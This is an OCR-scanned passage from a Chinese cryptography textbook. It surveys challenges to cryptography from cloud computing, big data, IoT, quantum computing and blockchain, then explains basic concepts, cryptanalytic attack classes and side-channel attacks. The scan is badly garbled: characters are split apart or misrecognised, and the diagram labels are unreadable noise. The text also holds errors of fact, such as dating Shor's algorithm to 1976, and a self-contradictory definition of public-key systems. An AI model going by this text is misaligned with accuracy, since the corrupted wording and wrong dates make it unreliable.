云 上 的 数据 可 能 被 恶意 自 改 ;@@ 存 放 在 云 上 的 个 人 信息 .照片 .视频 等 可 能 导致 个 人 隐私 
泄露 。 导 致 这 些 安全 问题 的 主要 原因 是 用 户 不 能 感知 和 控制 自己 的 数据 被 非法 访问 、 算 
改 和 利用 。 

总 而 言 之 , 云 计算 对 密码 的 新 需求 : 用 密码 感知 数据 存在 ;@ 用 密码 确保 数据 的 安 
全 性 ;@ 用 密码 确保 用 户 的 隐私 。 

近年 来 ,密码 学 家 们 在 云 安全 方面 进行 了 深入 研究 ,提出 了 许多 较 好 的 解决 方案 。 
Ateniese G 等 人 首次 提出 了 数据 持 有 证 明 (Provable Data Possession, PDP) 的 概念 ,构建 
了 一 种 模型 验证 云 存储 数据 的 完整 性 , 使 用 户 无 须 从 云端 下 载 完整 的 数据 。1978 年 ， 
Rivest 等 人 提出 同 态 加 密 概念 ,推出 了 最 早 的 公 钥 密码 体系 RSA ,此 方案 满足 乘法 同 态 
性 。2009 年 ,IBM 的 Gentry 提出 的 完全 同 态 加 密 (FHE) 方 案 是 密码 学 上 的 一 项 重大 突 
破 。 完 全 同 态 可 以 解决 云 计 算 的 安全 性 问题 ,委托 至 云端 的 数据 都 是 加 密 的 ,云端 在 不 解 
密 的 前 提 下 可 以 实现 用 户 请 求 的 操作 。 在 云端 数据 以 密 文 形式 存储 ,对 密 文 的 处 理 等 于 
对 明文 数据 的 处 理 , 这 样 数据 永远 以 密 文 形式 存在 ,确保 了 云 存储 数据 的 安全 性 。 

例如 ,银行 有 许多 交易 数据 需要 进行 分 析 , 但 若 其 本 身 的 数据 处 理 能 力 较 弱 ,可 以 把 
交易 数据 加 密 后 交 给 云端 数据 处 理 中 心 来 进行 处 理 分 析 。 处 理 中 心 对 数据 进行 分 析 ,得 
出 结果 并 返回 。 在 这 个 过 程 中 ,数据 处 理 中 心 接触 到 的 都 是 密 文 ,这 样 就 可 以 充分 保证 银 
行 数据 的 机 密 性 。 

再 如 ,医疗 机 构 可 以 将 病人 的 医疗 数据 加 密 后 存储 至 云端 ,云端 对 数据 进行 一 些 统计 
分 析 , 可 以 对 病情 进行 预测 和 给 出 治疗 建议 ,这 样 既 保证 了 病人 的 隐私 ,又 充分 利用 了 云 
端的 强大 的 计算 能 力 。 


2. 大 数据 对 密码 学 的 新 挑战 

图 灵 奖 获得 者 吉姆 。 格雷 (Jim Gray) 说 : 网 络 环境 下 每 18 个 月 产生 的 数据 量 等 于 
过 去 几 千 年 的 数据 量 总 和 。 国 际 数据 公司 (IDC) 的 (数据 宇宙 ) 报 告 显示 : 2008 年 全 球 数 
据 量 为 0.5ZB,2010 年 为 1.2ZB, 人 类 正式 进入 ZB 时 代 。 更 为 惊人 的 是 ,2020 年 以 前 全 
球 数据 量 仍 将 保持 每 年 40% 多 的 高 速 增长 .大 约 每 两 年 就 翻 一 倍 , 这 与 IT 界 的 摩尔 定律 
极为 相似 ,姑且 称 之 为 “大 数据 爆炸 定律 ”。 

什么 是 大 数据 (Big Data)? 大 数据 研究 机 构 Gartner 给 出 了 这 样 的 定义 :“ 大 数据 ” 
是 需要 新 处 理 模 式 才 能 具有 更 强 的 决策 力 ,洞察 发 现 力 和 流程 优化 能 力 的 海量 、 高 增长 率 
和 多 样 化 的 信息 资产 。 维 基 百 科 的 定义 : 大 数据 是 指 无 法 在 可 承受 的 时 间 范 围 内 用 常规 
软件 工具 进行 捕 提 ,管理 和 处 理 的 数据 集合 。 

简单 来 说 ,大 数据 具有 4V 的 特点 : VolumeCK 3 , Velocity CES 3D , Variety FÉ , 
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Value( 价 值 )。2005 年 ,全 球 的 数据 量 为 130EB.2010 年 全 球 的 数据 量 为 1.227ZB(1ZB= 
1024EB— 1024 X 1024PB — 1024 X 1024 X 1024 TB — 1024 X 1024 X 1024 X 1024GB=2” 
Byte) ,2020 年 ,全 球 的 数据 量 将 达 40ZB( 此 数字 是 地 球 上 所 有 海滩 的 沙 粒 数 量 的 57 
倍 ) 。 数 据 量 在 15 年 内 增长 了 315 倍 ,这 也 预示 着 大 数据 时 代 已 经 到 来 。 

大 数据 在 存储 传输、 处 理 (查询 .分析 、 管 理 和 使 用 ) 等 方面 ,都 为 密码 学 带 来 了 新 的 
挑战 。 由 于 大 数据 的 数据 量 特别 巨大 ,数据 存在 多 样 性 ,使 密码 算法 需要 处 理 的 数据 规模 
不 断 增 大 ,使 用 密码 技术 的 成 本 不 断 提高 ,这 就 要 求 密码 算法 具有 高 效 性 和 很 强 的 适应 性 
(柔性 ) 。 


3. 物 联 网 对 密码 学 的 新 需求 

物 联 网 (Internet of Things) 就 是 使 万 物 互 联 的 因特网 ,通过 RFID 或 传感器 感知 物 
体 属 性 ,通过 各 种 网 络 实现 互联 ,经 过 数据 融合 处 理 产生 各 种 应 用 。 物 联网 被 誉 为 是 继 计 
算 机 、 因 特 网 之 后 的 信息 领域 的 第 三 次 浪潮 , 它 实 现 了 物 与 物 . 人 与 物 . 人 与 人 之 间 的 
互联 。 

物 联网 面临 着 数据 安全 、 网 络 安全 、 系 统 安全 、 隐 私 保 护 的 问题 , 物 联网 对 密码 提出 了 
新 的 挑战 , 它 要 求 : 密码 要 适应 数据 多 样 性 (物体 多 样 性 使 数据 多 样 性 ) ;四 密码 要 适应 
网 络 多 样 性 ,多 层次 ( 传 感 网 .无线 网 有线 网 ,内 网 和 外 网 ) ;图 密码 要 适应 各 层次 的 资源 
差异 较 大 (感知 层 资源 弱 ,管理 层 资 源 强 ) ,因此 需要 多 密码 .多 密 钥 、 多 安全 级 别 、 跨 域 互 
联 互 通 。 


4. 新 型 计算 机 对 密码 学 的 新 挑战 

计算 机 和 网 络 的 计算 能 力 不 断 提升 ,新 的 量子 计算 机 .DNA 计算 机 也 已 办 露头 角 , 人 
们 对 密码 算法 的 破译 能 力 不 断 提高 ,迫使 所 选 密码 算法 的 数据 规模 不 断 加 大 ,保证 信息 安 
全 的 代价 越 来 越 大 。 无 论 是 加 拿 大 的 专用 量子 计算 机 ,还 是 美国 的 通用 量子 计算 机 ,都 取 
得 了 重要 进展 ,DNA 计算 机 的 发 展 速度 也 是 惊人 的 。 

现 有 的 密码 是 建立 在 数学 难题 的 求解 之 上 的 ,如 果 计 算 机 能 够 求解 数学 难题 , 则 可 以 
破译 密码 。 量 子 计 算 机 和 生物 计算 机 可 以 做 并 行 计算 ,计算 能 力 强大 ,因此 量子 计算 机 和 
生物 计算 机 进一步 发 展 ,将 直接 威胁 现 有 密码 的 安全 。 

量子 计算 机 已 经 对 现 有 密码 构成 严重 威胁 。1976 年 ,美国 科学 家 Shor 提出 Shor 算 
法 ,能 够 在 有 效 时 间 内 攻击 RSA、ElGamal ,椭圆 曲线 (ECC) 等 公 钥 密码 。 我 国 二 代 身 份 
证 采用 了 256 位 的 椭圆 曲线 (ECC) 公 和 钥 密 码 , 而 1448 位 的 量子 计算 机 可 以 攻破 256 位 的 
ECC 公 钥 密码 , 若 1448 位 的 量子 计算 机 研制 出 来 ,我 国 的 二 代 身 份 证 就 失去 了 安全 性 。 
目前 ,电子 商务 网 络 普遍 采用 了 1024 位 的 RSA 密码 ,而 2048 位 的 量子 计算 机 就 可 以 攻 
破 1024 位 的 RSA 密码 。DNA 计算 机 的 发 展 同样 对 现 有 密码 构成 威胁 ,量子 计算 机 和 
DNA 计算 机 强大 的 计算 能 力 可 以 攻破 现 有 的 许多 密码 算法 。 因 此 ,设计 可 以 抗 量子 计算 
的 密码 是 一 个 十 分 紧迫 的 研究 课题 。 

5. 区 块 链 技术 对 密码 学 的 新 挑战 

2008 年 ,中 本 聪 发 表 了 《比特 币 : 一 种 点 对 点 的 电子 现金 系统 》, 正 式 提 出 区 块 链 的 
概念 。 区 块 链 作为 比特 币 方案 的 底层 支撑 技术 ,近年 来 在 国内 外 均 受 到 了 高 度 重视 。 尽 
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管 在 区 块 链 领域 ,密码 学 的 应 用 已 经 取得 了 一 系列 令 人 瞩目 的 技术 突破 ,但 是 与 任何 一 个 
新 兴 技 术 领 域 类 似 , 其 发 展 过 程 中 还 存在 着 很 多 困难 与 挑战 。 

首先 ,与 传统 的 中 心 化 系统 相 比 ,区 块 链 由 于 需要 在 众多 节点 间 通 过 共识 机 制 达成 一 
致 ,因此 其 性 能 目前 还 比较 低下 。 共 识 一 般 仅 需要 在 几 个 到 几 十 个 节点 间 达 成 , 当 节 点 数 
增多 ,共识 性 能 将 大 幅 下 降 , 因 此 可 扩展 性 是 其 主要 的 限制 。 由 于 性 能 的 瓶颈 导致 区 块 链 
当前 的 应 用 场景 比较 适合 于 高 价值 低频 的 交易 领域 ,还 无 法 很 好 地 支撑 小 额 支付 等 场 
景 。 目 前 来 看 ,区 块 链 的 性 能 主要 受到 共识 算法 的 影响 ,对 于 某 些 宣称 能 达到 很 高 性 能 的 
区 块 链 项 目 ,基本 都 是 需要 牺牲 一 头 去 换取 另 一 头 , 结 合 分 片 分 层 等 手段 ,但 需要 与 特定 
实际 场景 相 结合 。 

第 二 ,区 块 链 核心 技术 的 突破 还 需要 依赖 密码 技术 底层 算法 ,协议 的 突破 。 相 比 于 其 
他 信息 技术 领域 ,在 区 块 链 领域 ,一 些 高 级 的 密码 方案 已 经 得 到 了 实践 。 例 如 ,有 一 些 项 
目 在 研究 基于 全 同 态 加 密 解 决 区 块 链 隐私 与 安全 问题 ,但 从 目前 全 同 态 加 密 的 学 术 进 展 
来 看 ,还 远 未 到 达能 够 落地 实践 的 阶段 。 此 外 ,为 了 抵御 未 来 量子 计算 机 发 展 对 现 有 密码 
体制 尤其 是 公 钥 密码 体制 带 来 的 颠覆 性 冲击 ,密码 学 术 界 已 经 发 展 出 了 几 类 抗 量子 密码 
算法 ,在 区 块 链 发 展 的 过 程 中 ,需要 及 时 关注 并 融入 这 些 新 的 密码 算法 ,以 打造 牢固 的 安 
全 根基 。 可 以 说 ,区 块 链 核心 技术 的 攻关 将 长 期 伴随 着 密码 技术 的 突破 ,而 这 些 密 码 底 层 
算法 、 密 码 协议 的 研究 已 经 属于 密码 原 语 (或 接近 原 语 ) 层 面 上 的 研究 ,突破 起 来 将 十 分 艰 
难 ,但 每 一 次 大 的 进展 都 将 有 可 能 助 推 区 块 链 技术 上 一 个 台阶 。 

第 三 ,密码 技术 是 区 块 链 的 基础 核心 ,密码 技术 是 一 个 高 度 专业 的 领域 ,具有 密码 学 
应 用 专业 水 准 的 工程 师 较 为 荐 乏 , 懂 区 块 链 的 专业 人 才 更 是 缺乏 。 区 块 链 技术 多 年 以 来 
一 直 集 中 在 密码 极 客 圈子 中 发 展 , 形 成 了 一 个 小 众 的 生态 。 近 几 年 来 ,现实 应 用 对 区 块 链 
技术 越 来 越 重视 ,密码 学 术 界 ,世界 科技 巨头 均 纷 纷 投资 开展 区 块 链 技术 的 研究 。 但 是 ， 
区 块 链 要 发 展 成 为 全 球 有 影响 力 的 技术 产业 ,需要 大 量 的 高 素质 工程 师 , 不 仅 能 够 和 密码 
学 术 成 果 对 接 ,而 且 还 需要 具备 高 水 平 的 密码 工程 能 力 。 而 密码 技术 在 区 块 链 的 工程 化 
实现 中 还 存在 密码 算法 协议 误 用 、 软 件 代 码 漏洞 等 诸多 不 易 察 觉 的 安全 隐患 。 在 区 块 链 
技术 发 展 过 程 中 ,密码 学 将 长 期 面 对 这 些 挑战 。 


22 密码 学 基本 概念 


保密 学 (Cryptology) 是 研究 信息 系统 安全 保密 的 科学 。 它 包含 两 个 分 支 , 即 密码 编 
码 学 (Cryptography) 和 密码 分 析 学 (Cryptoanalysis) 。 密 码 编码 学 是 对 信息 进行 编码 实 
现 隐 项 信息 的 一 门 学 问 ,而 密码 分 析 学 是 研究 分 析 破译 密码 的 学 问 ,两 者 相互 对 立 ,而 又 
互相 促进 地 向 前 发 展 。 

采用 密码 方法 可 以 隐蔽 和 保护 需要 保密 的 消息 ,使 未 授权 者 不 能 提取 信息 。 被 隐蔽 
消息 称 作 明文 消息 (Plaintext)。 密 码 可 将 明文 变换 成 另 一 种 隐蔽 的 形式 , 称 为 密 文 
(Ciphertext) ,这 种 变换 过 程 称 为 加 密 (Encryption) ,与 加 密 相对 应 的 逆 过 程 , 即 由 密 文 恢 
复出 原 明 文 的 过 程 称 为 解密 (Decryption)。 对 明文 进行 加 密 操作 的 人 员 称 为 加 密 员 或 密 
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码 员 (Cryptographer)。 密 码 员 对 明文 进行 加 密 时 所 采用 的 一 组 规则 称 为 加 密 算法 
(Encryption Algorithm) 。 传 送 消息 的 预定 对 象 称 为 接收 者 (Receiver) ,他 对 密 文 进行 解 
密 时 所 采用 的 一 组 规则 称 为 解密 算法 (Decryption Algorithm) 。 加 密 和 解密 算法 的 操作 
通常 都 是 在 一 组 密 钥 (Key) 控 制 下 进行 的 ,分 别称 为 加 密 密 钥 和 解密 密 钥 。 传 统 密码 体 
制 (Conventional Cryptographic System) 所 用 的 加 密 密 钥 和 解密 密 钥 相同 ,或 实质 上 等 
同 , 即 从 一 个 易于 得 出 另 一 个 , 称 为 单 钥 (One-key) 或 对 称 密码 体制 (Symmetric 
Cryptosystem)。 若 加 密 密 钥 和 解密 密 钥 不 相同 ,从 一 个 难以 推出 另 一 个 , 则 称 为 双 钥 
(Two-key) 或 非 对 称 密码 体制 (Asymmetric Cryptosystem), 这 是 1976 年 由 Diffie 和 
Hellman 等 人 所 开创 的 新 体制 。 密 钥 是 密码 体制 安全 保密 的 关键 , 它 的 产生 和 管理 是 密 
码 学 中 的 重要 研究 课题 。 

在 信息 传输 和 处 理 系统 中 ,除了 意 定 的 接收 者 外 ,还 有 非 授 权 的 攻击 者 ,他 们 通过 各 
种 办 法 (如 搭 线 窃 听 . 电磁 窃听 .声音 窃听 等 ) 来 窃取 机 密 信 息 , 称 为 窃听 者 
(Eavesdropper) 。 他 们 虽然 不 知道 加 密 系 统 所 用 的 密 钥 ,但 通过 分 析 可 能 从 截获 的 密 文 
中 推断 出 原来 的 明文 或 密 钥 , 这 一 过 程 称 为 密码 分 析 (Cryptanalysis) 。 从 事 这 一 工作 的 
人 称 为 密码 分 析 员 (Cryptanalyst) 。 如 前 所 述 ,研究 如 何 从 密 文 推演 出 明文 、 密 钥 或 解密 
算法 的 学 问 称 为 密码 分 析 学 。 对 一 个 保密 系统 采取 窃听 来 截获 密 文 进行 分 析 的 这 类 攻击 
称 为 被 动 攻击 (Passive Attack)。 现 代 信 息 系 统 还 可 能 遭受 另 一 类 主动 攻击 (Active 
Attack) ,此 类 攻击 是 指 非法 入 侵 者 (Tamper) ,攻击 者 (Attacker) 或 黑客 (Hacker) 主动 窜 
扰 信 息 系统 ,采用 删除 、 增 添 、 重 放 、 伪 造 等 窗 改 手段 向 系统 注入 假 消息 ,达到 利己 害 人 的 
目的 。 这 是 现代 信息 系统 中 更 为 球 手 的 问题 。 

保密 系统 模型 如 图 2-16 所 示 。 


主动 攻击 者 | oe c 被 动 攻击 者 |_m 
(非法 接 入 ) | (窃听 者 ) 


Uo imo 加密 器 | | 解密 器 ”|m _| we ud 
( 信 源 ) c7 Ey(m) m= DyXc) ( 信 宿 ) 
2 , 
密 钥 源 密 钥 源 
K, ra 


图 2-16 保密 系统 原理 框图 


2.2.1 密码 体制 的 分 类 
[s] us 


单 双 钥 密 密码 体制 从 原理 上 可 分 为 两 大 类 , 即 单 钥 密码 体制 (One-key Cryptosystem) 和 双 钥 
end 密码 体制 (Two-key Cryptosystem) 。 

单 钥 体 制 的 加 密 密 钥 和 解密 密 钥 相 同 , 因 此 又 称 为 对 称 密码 体制 (Symmetric 
Cryptosystem)、 传 统 密码 体制 (Conventional Cryptosystem ) 或 秘密 密 钥 密码 体制 
(Secret-key Cryptosystem) 。 当 Alice 和 Bob 进行 保密 通信 时 .双方 必须 采用 相同 的 密 钥 
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k 对 明文 消息 mn 进行 加 密 和 对 密 文 c 解密 。 然 而 ,采用 单 钥 密 码 体制 进行 保密 通信 时 , 必 
须 在 双方 开始 通信 之 前 ,将 密 钥 安全 地 送 达 通信 双方 。 在 双 钥 密码 体制 发 明之 前 ,这 
项 密 钥 传 递 的 工作 只 能 由 信使 来 完成 。 一 旦 信使 叛变 ,就 会 造成 泄密 。 因 此 , 单 钥 密 码 体 


制 最 大 的 问题 是 密 钥 的 分 发 问题 。 密 钥 单 钥 加 密 系统 原理 框图 如 图 2-17 所 示 。 
Alice ”| " | 加 密 器 ld 解密 器 |m_| Bob 
(发 信者 ) c-E(m) | | m=Di(o) ( 收 信者 ) 
5o | emm] 5 
密 钥 信 道 K 密 钥 信道 


2-17 单 钥 密 码 体制 加 密 原理 框图 


1976 年 ,Diffie 和 Hellman 首先 提出 了 双 钥 密码 体制 的 思想 。 与 单 钥 密码 体制 不 
同 , 采 用 双 钥 体制 的 每 个 用 户 都 有 一 对 选 定 的 密 钥 : 一 个 是 可 以 公开 的 , 称 为 公 钥 ,以 pk 
表示 , 公 钥 可 以 像 电话 号 码 一 样 进行 注册 公布 ; 另 一 个 则 是 秘密 的 , 称 为 私 钥 , 以 sk 表示 ， 
私 钥 必须 要 严格 保密 。 因 此 , 双 钥 体制 又 称 为 双 钥 体制 。 当 Alice 向 Bob 传送 加 密 信息 
时 ,她 必须 用 Bob 的 公 钥 加 密 , 而 Bob 要 用 自己 的 私 钥 对 密 文 解密 ,因此 双 钥 体制 也 称 为 
公 钥 密码 体制 (Publickey Cryptosystem ) 或 非 对 称 密码 体制 (Asymmetric 
Cryptosystem) 。 双 钥 密码 体制 加 密 原 理 框图 如 图 2-18 所 示 。 


Ale |" | Jd | 5 5 | Mg "m ^ — Bob 
(发 信者 ) c= Epa(m) m= Dc) ( 收 信者 ) 
人 sk'/pk* sk'/pk? ! 

密 钥 源 密 钥 源 
K, K 


图 2-18. 双 钥 密码 体制 加 密 原 理 框图 


双 钥 密码 体制 的 主要 特点 是 将 加 密 和 解密 能 力 分 开 , 因 而 可 以 实现 多 个 用 户 加 密 的 
消息 只 能 由 一 个 用 户 解读 ,或 只 能 由 一 个 用 户 加 密 消息 而 使 多 个 用 户 可 以 解读 。 前 者 可 
用 于 公共 网 络 中 实现 保密 通信 ,而 后 者 可 用 于 认证 系统 中 对 消息 进行 数字 签名 。 

由 于 保密 信息 系统 的 安全 性 主要 取决 于 密 钥 的 保密 ,因此 必须 通过 安全 可 靠 的 途径 
(如 信使 递送 ) 将 密 钥 送 至 收 信 者 。 如 何 产 生 满 足 保密 要 求 的 密 钥 是 这 类 体制 设计 和 实现 
的 主要 课题 。 另 一 个 重要 问题 是 如 何 将 密 钥 安全 可 靠 地 分 配给 通信 对 方 。 在 网 络 通信 环 
境 下 ,安全 的 密 钥 分 发 和 传递 就 变 得 更 为 复杂 。 密 钥 产 生 、 分 配 、 存 储 、 销 毁 等 多 方面 的 问 
题 ,统称 为 密 钥 管 理 (Key Management) 。 密 钥 管理 是 影响 系统 安全 的 关键 因素 ,即使 密 
码 算 法 再 好 , 若 密 钥 管 理 问 题 处 理 不 好 ,就 很 难保 证 系统 的 安全 保密 。 有 关 密 钥 管理 的 内 
容 将 在 后 续 专 业 课 的 学 习 中 深入 介绍 。 

2.2.2 ”密码 分 析 od 


密码 分 析 
密码 分 析 学 是 研究 分 析 解 密 规律 的 科学 。 密 钥 分 析 的 实质 就 是 在 攻击 者 不 知道 密 钥 Sese 
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的 情况 下 ,对 所 截获 的 密 文 或 明 - 密 文 对 采用 各 种 不 同 的 密码 分 析 方 法 试图 恢复 出 明文 或 
密 钥 。 密 码 分 析 在 外 交 、 军 事 、 公 安 、 商 业 等 方面 都 具有 重要 作用 ,也 是 研究 历史 、 考 古 、 古 
语言 学 和 古 乐 理论 的 重要 手段 之 一 。 

密码 设计 和 密码 分 析 是 共生 的 、 又 是 互 逆 的 ,两 者 密切 相关 但 追求 的 目标 相反 。 两 者 
解决 问题 的 途径 有 很 大 差别 。 密 码 设 计 是 利用 数学 来 构造 密码 ,而 密码 分 析 除 了 依靠 数 
学 工程 背景 .语言 学 等 知识 外 ,还 要 靠 经 验 、 统 计 , 测 试 、 眼 力 、 直 觉 判 断 能 力 等 ,有 时 还 靠 
点 运气 。 密 码 分 析 过 程 通常 包括 分 析 ( 统 计 截 获 报 文 材料 ) ,假设 ,推断 和 证 实 等 步骤 。 

密码 的 安全 性 有 两 种 : 一 种 是 理论 上 绝对 不 可 破译 的 密码 ,我们 称 其 有 理论 上 的 安 
全 性 (Theoretical Security) 。 这 种 理论 上 安全 的 密码 只 有 一 种 ,就 是 前 面 曾 介 绍 过 的 “一 
次 一 密 ” 密 码 体制 。 由 于 “一 次 一 密 ” 密 码 要 求 加 密 密 钥 永 不 重复 ,存在 密 钥 管理 的 困难 
性 ,因此 "一 次 一 密 ” 密 码 在 实际 工作 中 不 会 采用 。 另 一 种 密码 具有 实际 上 的 安全 性 密码 
(Practical Security) ,或 者 称 为 计算 上 的 安全 性 (Computational Security)。 对 于 这 种 密 
码 , 只 要 给 攻击 者 足够 的 时 间 和 存储 资源 ,都 是 可 以 破译 的 。 今 天 我 们 在 教科 书 中 讲 到 的 
很 多 密码 算法 ,如 DES、AES、RSA 等 ,在 理论 上 都 是 可 以 破译 的 。 

根据 攻击 者 对 明文 、 密 文 等 可 利用 的 信息 资源 的 掌握 情况 ,密码 攻击 可 分 为 以 下 4 种 
EU 

(1) 唯 密 文 破译 (Ciphertext-Only Attacks) 。 分 析 者 从 仅 知 道 的 截获 密 文 进行 分 析 ， 
试图 得 出 明文 或 密 钥 。 攻 击 者 手中 除了 截获 的 密 文 外 ,没有 其 他 任何 辅助 信息 。 唯 密 文 
攻击 是 最 常见 的 一 种 密码 分 析 类 型 ,也 是 难度 最 大 的 一 种 。 

(2) 已 知 明文 破译 (Known-Plaintext Attacks)。 分 析 者 除了 有 截获 的 密 文 外 ,还 有 
一 些 ( 通 过 各 种 手段 得 到 的 ) 已 知 的 明文 - 密 文 对 ,试图 从 中 得 出 明文 或 密 钥 。 举 例 来 看 ， 
如 果 是 遵从 通信 协议 的 对 话 ,由 于 协议 中 使 用 固定 的 关键 字 , 如 login, password 等 ,通过 
分 析 可 以 确定 这 关键 字 对 应 的 密 文 。 如 果 传 输 的 是 法 律 文件 .单位 通知 等 类 型 的 公文 ,由 
于 大 部 分 公文 有 固定 的 格式 和 一 些 约定 的 文字 ,在 截获 的 公文 较 多 的 条 件 下 ,可 以 推测 出 
一 些 文字 .词组 对 应 的 密 文 。 

(3) 选择 明文 破译 (Chosen-Plaintext Attacks)。 分 析 者 可 以 选 定 任何 明文 - 密 文 对 
进行 攻击 ,以 确定 未 知 的 密 钥 。 攻 击 者 知道 加 密 算法 ,同时 能 够 选择 明文 并 得 到 相应 明文 
所 对 应 的 密 文 。 这 是 比较 常见 的 一 种 密码 分 析 类 型 。 例 如 ,攻击 者 截获 了 有 价值 的 密 文 ， 
并 获取 了 加 密使 用 设备 ,向 设备 中 输入 任意 明文 可 以 得 到 对 应 的 密 文 , 以 此 为 基础 ,攻击 
者 尝试 对 有 价值 的 密 文 进行 破解 。 选 择 明文 攻击 常常 被 用 于 破解 采用 双 钥 密码 系统 加 密 
的 信息 内 容 。 

(4) 选择 密 文 攻击 (Chosen-Ciphertext Attack) 。 分 析 者 可 以 利用 解密 机 , 按 他 所 选 
的 密 文 解 密 出 相应 的 明文 。 双 钥 体 制 下 ,类 似 于 选择 明文 攻击 ,他 可 以 得 到 任意 多 的 密 文 
对 密码 进行 分 析 。 攻 击 者 知道 加 密 算法 ,同时 可 以 选择 密 文 并 得 到 对 应 的 明文 。 采 用 选 
择 密 文 攻 击 这 种 攻击 方式 ,攻击 者 的 攻击 目标 通常 是 加 密 过 程 使 用 的 密 钥 。 基 于 双 钥 密 
码 系统 的 数字 签名 ,容易 受到 这 种 类 型 的 攻击 。 

由 此 可 见 , 这 几 类 攻击 的 强度 依次 增 大 . 唯 密 文 攻击 最 弱 。 或 者 反 过 来 说 , 唯 密 文 攻 
击 难度 最 大 ,而 其 他 攻击 方式 依次 变 得 更 容易 一 些 。 
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根据 密码 分 析 者 所 采用 的 密码 破译 (Break) 或 攻击 (Attack) 技 术 方 法 ,密码 分 析 方法 
又 可 以 分 为 3 种 ,它们 分 别 是 : @ 穷 举 破译 法 (Exhaustive Attack Method) ;加 数学 攻击 
法 (Mathematic Analysis Method) ; 9] Xt ii (Physical Attack Method) 。 


1. 穷 举 攻击 法 

穷 举 破译 法 又 称 为 强力 攻击 法 (Brute-Force Attack Method) , 它 是 对 截 收 的 密 报 依 
次 用 各 个 可 能 的 密 钥 试 译 ,直至 得 到 有 意义 的 明文 ;或 在 密 钥 不 变 的 情况 下 ,对 所 有 可 能 
的 明文 加 密 直 到 所 生产 的 密 文 与 所 截获 的 密 报 一 致 为 止 , 此 法 又 称 为 完全 试 次 法 
(Complete trial-and-error Method). 。 原 则 上 ,只 要 攻击 者 有 足够 多 的 计算 时 间 和 存储 容 
量 , 穷 举 法 总 是 可 以 成 功 的 。 但 在 实际 工作 中 ,任何 一 种 能 达到 安全 要 求 的 实用 密码 都 会 
设计 得 使 这 一 攻击 方法 在 实际 上 不 可 行 。 

2. 数学 攻击 法 

所 谓 数学 攻击 ,是 指 密码 分 析 者 针对 加 解密 算法 所 采用 的 数学 变换 和 某 些 密码 学 特 
性 ,通过 数学 求解 的 方法 来 获得 明文 或 密 钥 。 大 部 分 现代 密码 系统 以 数学 难题 作为 理论 
基础 。 数 学 分 析 法 是 指 攻击 者 针对 密码 系统 的 数学 基础 和 密码 学 特性 ,利用 一 些 已 知 量 ， 
如 一 些 明 文 和 密 文 的 对 应 关系 ,通过 数学 求解 破译 密 钥 等 未 知 量 的 方法 。 对 于 基于 数学 
难题 的 密码 系统 ,数学 分 析 法 是 一 种 重要 的 破解 手段 。 

对 分 组 密码 的 常用 数学 攻击 方法 是 差分 密码 分 析 。 实 践 证 明 , 对 于 分 组 密码 的 攻击 ， 
差分 密码 分 析 的 速度 要 比 穷 举 攻击 法 的 速度 快 得 多 。 

另 一 种 数学 攻击 方法 称 为 分 析 破 译 法 。 分 析 破 译 法 是 最 早 使 用 的 一 种 数学 分 析 攻 
击 , 在 破译 古典 密码 和 二 战 时 期 各 参战 国 使 用 的 机 械 密码 中 发 挥 了 很 大 作用 。 分 析 破 译 
法 又 可 以 分 为 确定 性 分 析 法 和 统计 性 分 析 法 两 类 。 

确定 性 分 析 法 是 利用 一 个 或 几 个 已 知 量 (例如 已 知 密 文 或 明文 - 密 文 对 ) 用 数学 关系 
式 表示 出 所 求 未 知 量 (如 密 钥 等 )。 已 知 量 和 未 知 量 的 关系 视 加 密 和 解密 算法 而 定 , 寻 求 
这 种 关系 是 确定 性 分 析 法 的 关键 步骤 。 例 如 ,以 n 级 线性 移 存 器 序列 作为 密 钥 流 的 流 密 
码 , 就 可 在 已 知 2n. bit 密 文 下 ,通过 求解 线性 方程 组 破译 。 

统计 分 析 法 是 利用 明文 的 已 知 统计 规律 进行 破译 的 方法 。 密 码 破 译 者 对 截 收 的 密 文 
进行 统计 分 析 , 总 结 出 其 间 的 统计 规律 ,并 与 明文 的 统计 规律 进行 对 照 比 较 , 从 中 提取 出 
明文 和 密 文 之 间 的 对 应 或 变换 信息 。 例 如 ,在 一 些 古 典 密码 加 密 系统 中 , 密 文中 字母 及 字 
母 组 合 的 统计 规律 与 明文 的 某 个 字母 或 某 个 字母 组 合 完全 相同 ,攻击 者 就 可 以 采用 统计 
分 析 法 破译 此 类 密码 。 要 对 抗 统计 分 析 攻 击 ,在 设计 密码 系统 时 ,应 当 竭力 避免 密 文 和 明 
文 之 间 在 统计 规律 上 存在 一 致 性 ,从 而 使 攻击 者 无 法 通过 分 析 密 文 的 统计 规律 来 推断 明 
文 内 容 。 


3. 物理 攻击 
所 谓 物 理 攻击 ,是 指 攻 击 者 利用 密码 系统 或 密码 芯片 的 物理 特性 ,通过 对 系统 或 芯片 
运行 过 程 中 所 产生 的 一 些 物 理 量 进行 物理 和 数学 分 析 。 物 理 攻击 之 所 以 可 以 得 进 , 主 要 
是 因为 密码 算法 在 硬件 系统 上 运行 时 ,所 用 的 集成 电路 芯片 的 管 脚 电 平 是 可 以 实时 监测 
到 的 ,而 且 存在 一 定 的 电磁 辐射 和 泄露 ,也 可 能 产生 密码 算法 运行 故障 。 此 类 信息 称 为 侧 
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信道 信息 ,基于 侧 信 道 信 息 的 密码 攻击 称 为 侧 信 道 攻击 或 侧 信 道 分 析 。 

侧 信道 攻击 技术 能 够 通过 物理 信道 直接 获得 密码 运算 的 中 间 信 息 , 也 能 够 分 段 恢 复 
较 长 的 密 钥 ,因而 它 比 传统 密码 分 析 更 容易 攻击 实际 密码 系统 。 目 前 国际 主流 的 密码 产 
品 测评 机 构 均 把 侧 信道 攻击 的 防护 能 力作 为 衡量 设备 或 芯片 安全 性 的 主要 指标 , 但 产品 
即使 取得 了 权威 的 安全 认证 , 仍然 可 能 会 被 侧 信道 攻击 攻破 。 

近 40 年 来 , 通过 正常 信道 的 明文 、 密 文 来 恢复 密 钥 的 传统 密码 分 析 技 术 被 广泛 研 
究 。 然 而 , 由 于 密码 运算 过 程 复 杂 、 密 钥 长 度 较 长 ,传统 密码 分 析 技 术 实 用 化 的 可 能 性 较 
小 。 相 比 之 下 ,从 物理 信道 中 提取 信息 的 侧 信道 攻击 技术 有 两 个 得 天 独 厚 的 条 件 : 一 是 
能 够 直接 获取 密码 算法 运算 过 程 中 的 中 间 值 信息 ,二 是 能 够 分 段 恢复 较 长 的 密 钥 , 它 极 具 
实用 化 特点 和 潜在 的 破坏 性 ,因而 是 近年 来 国际 密码 学 界 研究 的 热点 方向 之 一 。 

狭义 上 讲 , 侧 信道 攻击 特 指针 对 密码 算法 的 计时 攻击 、 能 量 攻击 .电磁 攻击 .故障 攻 
